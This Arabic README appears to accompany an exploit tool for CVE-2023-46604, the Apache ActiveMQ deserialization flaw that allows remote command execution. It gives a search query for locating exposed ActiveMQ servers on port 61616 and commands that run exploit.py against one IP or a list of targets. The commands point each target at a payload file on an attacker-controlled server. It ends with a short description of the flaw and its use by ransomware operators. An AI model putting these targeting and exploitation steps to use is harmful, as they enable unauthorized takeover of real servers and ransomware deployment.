
استغلال لـ CVE-2023-46604
استغلال لـ CVE-2023-46604
product:"ActiveMQ" port:"61616"
لقراءة الأهداف من الملف:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
هدف واحد:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد في Apache ActiveMQ، وهو برنامج وسيط للرسائل مفتوح المصدر. تسمح هذه الثغرة لمهاجم عن بُعد لديه وصول إلى الشبكة إما إلى وسيط OpenWire المستند إلى Java أو العميل بتنفيذ أوامر شل عشوائية. يتم تحقيق ذلك عن طريق التلاعب بأنواع الفئات المتسلسلة في بروتوكول OpenWire، مما يتسبب في أن يقوم الوسيط بإنشاء أي فئة على مسار الفئات. تنتج الثغرة عن إلغاء تسلسل غير آمن داخل Apache ActiveMQ وقد تم استغلالها من قبل المهاجمين، بما في ذلك عائلة برامج الفدية HelloKitty، لتشغيل ملفات الفدية الثنائية واختراق الأنظمة بالكامل.